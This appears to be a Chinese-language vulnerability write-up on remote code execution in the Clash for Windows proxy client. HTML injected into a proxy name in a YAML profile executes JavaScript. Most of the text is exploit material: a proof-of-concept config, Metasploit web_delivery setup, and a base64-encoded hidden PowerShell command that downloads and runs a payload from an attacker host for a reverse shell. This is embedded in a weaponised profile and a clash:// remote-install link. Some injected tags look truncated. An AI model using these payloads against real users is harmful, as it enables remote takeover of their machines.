0x01 漏洞描述clash for windows是一个使用 Go 语言编写，基于规则的跨平台代理软件核心程序。
Clash for Windows 是运行在 Windows 上的一图形化 Clash 分支。
通过 Clash API 来配置和控制 Clash 核心程序，便于用户可视化操作和使用。
下载链接https://github.com/Fndroid/clash_for_windows_pkg/releases目前最新版本为V 0.20.12。
Windows 上的 clash_for_windows 在订阅一个恶意链接时存在远程命令执行漏洞。
代理规则配置文件中未设置严格的输入检测，攻击者可通过构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令。
0x02 漏洞影响影响版本版本：< V 0.20.12V操作系统：Windows x64系统版本：Windows 11风险等级：高危0x03 漏洞复现本次漏洞复现使用的版本为v 0.18.8 系统为Windows10新建 poc.yaml 文件，内容如下：port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies: - name: a<img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true​proxy-groups:- name: <img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif type: select proxies: - a<img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif​打开clash，进入Profiles，点击 import 导入刚刚新建的 poc.yaml 文件点击切换到导入的 yaml 文件上切换节点时，会弹出计算器，说明远程代码执行成功上线msf启动msf，搜索 web_delivery 模块使用 exploit/multi/script/web_delivery 模块设置 lhostset lhost 攻击机ip设置 target设置 payload生成反弹shell的payloadpowershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAFQAQgBrAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGMAVABCAGsALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABjAFQAQgBrAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADEAMAA4ADoAOAAwADgAOQAvADAAeQBhAEUASwBpAE0ANgBkAHYALwBYAHkARAB3AEwATQBtAHoAbgB4ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AOAAxAC4AMQAwADgAOgA4ADAAOAA5AC8AMAB5AGEARQBLAGkATQA2AGQAdgAnACkAKQA7AA==制作expport: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies: - name: a<img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true​​proxy-groups:- name: <img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'> type: select proxies: - a<img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>​将exp放到攻击机(kali)的根目录下在clash中导入点击切换到导入的 yaml 文件上切换节点时，就能上线msf0x04 漏洞分析crash_for_windows由 Electron 提供支持，该产品在代理规则配置文件中未设置严格的输入检测，攻击者可通过构造代理配置文件中的XSS Payload来执行任意Javascript命令。
"proxies"中的"name"字段嵌入html标签，"onerror"时触发语句执行。
- name: a<img/src=http://www.zxbk8.com/skin/wqhome/image/nopic.gif此外也可以使用本地导入的方式，将yaml的配置文件导入。
另一种方式使用浏览器弹窗进行操作。
clash://install-config?url=http://ip:port/eval.txt&name=RCE0x05 修复建议升级到最新版本0x06 参考链接https://github.com/Fndroid/clash_for_windows_pkg/issues/2710https://blog.csdn.net/WEARE001/article/details/123146639https://mp.weixin.qq.com/s/-jmAXSWOpncnLCWFEAiVgQ